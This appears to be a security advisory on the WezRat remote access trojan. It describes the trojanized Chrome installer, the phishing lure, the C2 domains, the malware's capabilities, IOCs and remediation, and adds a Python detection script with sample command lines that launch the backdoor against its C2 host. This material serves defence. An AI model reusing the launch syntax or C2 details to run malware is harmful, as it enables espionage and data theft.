November 18, 2024
Severity
High
Analysis Summary
Cybersecurity researchers have disclosed a novel remote access trojan and information stealer that Iranian state-sponsored attackers use to survey compromised endpoints and carry out malicious commands.
The malware, which the researchers have dubbed WezRat, has been present in the wild since at least September 1, 2023, according to artifacts uploaded to the VirusTotal database. WezRat is capable of keylogging, uploading data, taking screenshots, executing commands, and stealing cookie files and clipboard contents. Because some of these tasks are carried out by separate modules downloaded from the command-and-control (C2) server as DLL files, the primary component of the backdoor looks less suspicious.
Cotton Sandstorm, an Iranian threat group better known by the cover names Emennet Pasargad and, more recently, Aria Sepehr Ayandehsazan (ASA), is believed to be the creator of WezRat. U.S. cybersecurity officials first reported the malware late last month, characterizing it as an exploitation tool for gathering endpoint information and executing remote commands.
According to government officials, the attack chains use trojanized Google Chrome installers ("Google Chrome Installer.msi"). These installers not only install the genuine Chrome web browser but are also configured to run a second program called "Updater.exe" (known internally as "bd.exe"). This malware-laced executable collects system data and connects to a C2 server ("connect.il-cert[.]net") to await further commands.
WezRat has been delivered to several Israeli businesses in phishing emails that appear to come from the Israeli National Cyber Directorate (INCD). The emails, sent on October 21, 2024, from the address "alert@il-cert[.]net," told recipients to apply a Chrome security update immediately. The backdoor is executed with two parameters: "connect.il-cert.net 8765", which is the C2 server, and a number that serves as a 'password' allowing the backdoor to run correctly. According to the researchers, supplying the wrong password may cause the malware to execute incorrectly or even crash.

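The launch chain above (msiexec running the trojanized installer, the dropped Updater.exe/bd.exe, and the `<host> <port> <password>` argument shape pointing at the il-cert.net C2) lends itself to a process-creation triage check. The following is an added example written for this advisory, not code from the researchers or from the malware itself; the event field names, the sample events and the password value are constructed assumptions.

```python
import re

# Indicators taken from the advisory: installer name, dropped executable names
# and the C2 host/port the backdoor is launched with.
INSTALLER_NAME = "google chrome installer.msi"
DROPPED_EXES = {"updater.exe", "bd.exe"}
C2_HOSTS = {"connect.il-cert.net", "il-cert.net"}
C2_PORT = "8765"
# Launch shape described in the advisory: <binary> <c2-host> <port> <numeric password>
LAUNCH_RE = re.compile(r'\.exe"?\s+(?P<host>[\w.\-]+)\s+(?P<port>\d+)\s+(?P<password>\d+)\s*$', re.I)

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(event):
    """Return the advisory indicators matched by one process-creation event."""
    hits = []
    if basename(event.get("image", "")) in DROPPED_EXES:
        hits.append("dropped-executable:" + basename(event["image"]))
    # msiexec running the trojanised installer is the first stage of the chain
    if basename(event.get("parent_image", "")) == "msiexec.exe" and \
            INSTALLER_NAME in event.get("parent_command_line", "").lower():
        hits.append("spawned-by-trojanised-chrome-installer")
    m = LAUNCH_RE.search(event.get("command_line", ""))
    if m:
        host = m.group("host").lower()
        if host in C2_HOSTS or host.endswith(".il-cert.net"):
            hits.append(f"c2-launch-args:{host}:{m.group('port')}")
        elif m.group("port") == C2_PORT:
            hits.append("launch-args-shape-match")  # same shape and port, unknown host: lower confidence
    return hits

def scan(events):
    """Return (pid, hits) for every event that matched at least one indicator."""
    return [(e["pid"], h) for e in events if (h := classify(e))]

# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"pid": "4120", "image": r"C:\Temp\Updater.exe",
     "command_line": r'"C:\Temp\Updater.exe" connect.il-cert.net 8765 49311',
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "parent_command_line": r'msiexec.exe /i "C:\Downloads\Google Chrome Installer.msi"'},
    {"pid": "4188", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
     "parent_image": r"C:\Windows\explorer.exe", "parent_command_line": "explorer.exe"},
    {"pid": "4202", "image": r"C:\Temp\svc.exe",
     "command_line": r'"C:\Temp\svc.exe" backup.example.invalid 8765 49311',
     "parent_image": r"C:\Windows\explorer.exe", "parent_command_line": "explorer.exe"},
]
```

The lower-confidence shape match exists because earlier WezRat builds hard-coded their C2 addresses, so a host-only match would miss a renamed binary pointed at new infrastructure.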
Through its supported commands, which are implemented as additional DLL files downloaded from the server, the malware can add a second C2 server as a backup mechanism, upload and download files, take screenshots, record keystrokes, extract clipboard content, steal cookies from Chromium-based browsers, and run commands via cmd.exe. Earlier iterations of WezRat did not require the 'password' input to function; instead, the C2 server addresses were hard-coded. Initially, WezRat behaved more like a simple remote access trojan with basic commands; other functions, such as screenshot capture and a keylogger, were added over time and handled as distinct commands.
Additionally, the researchers' examination of the malware and its backend architecture indicates that WezRat's development and operations are the work of at least two distinct teams. WezRat's continuous improvement and development show a commitment to maintaining a flexible and covert cyber-espionage tool. Emennet Pasargad's attacks target a range of organizations in the US, Europe, and the Middle East, endangering not only direct political opponents but also any organization or person with influence over Iran's foreign or domestic narrative.
Impact
- Sensitive Data Theft
- Unauthorized Access
- Command Execution
- Cyber Espionage
Indicators of Compromise
Domain Name
- il-cert.net
- connect.il-cert.net
- onlinelive.info
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Disseminate information regarding the tactics, techniques, and procedures (TTPs) used by the threat group to target dissidents.
- Educate potential targets on the risks associated with engaging in online conversations with unknown individuals, especially on social media platforms.
- Encourage individuals to use secure communication tools and platforms that offer end-to-end encryption to protect sensitive information.
- Conduct phishing awareness training to help users recognize and avoid social engineering attacks, such as deceptive messages and links.
- Advise users to enable MFA on their accounts to add an extra layer of protection against unauthorized access.
- Ensure that all devices and software used are up to date with the latest security patches to mitigate vulnerabilities.
- Train individuals to be cautious when interacting with unknown individuals online and to be vigilant about unusual or suspicious requests.
- Implement network monitoring and intrusion detection systems to detect any unauthorized access attempts or unusual activities.
- Recommend the use of secure messaging and communication platforms that offer end-to-end encryption and protect conversations from interception.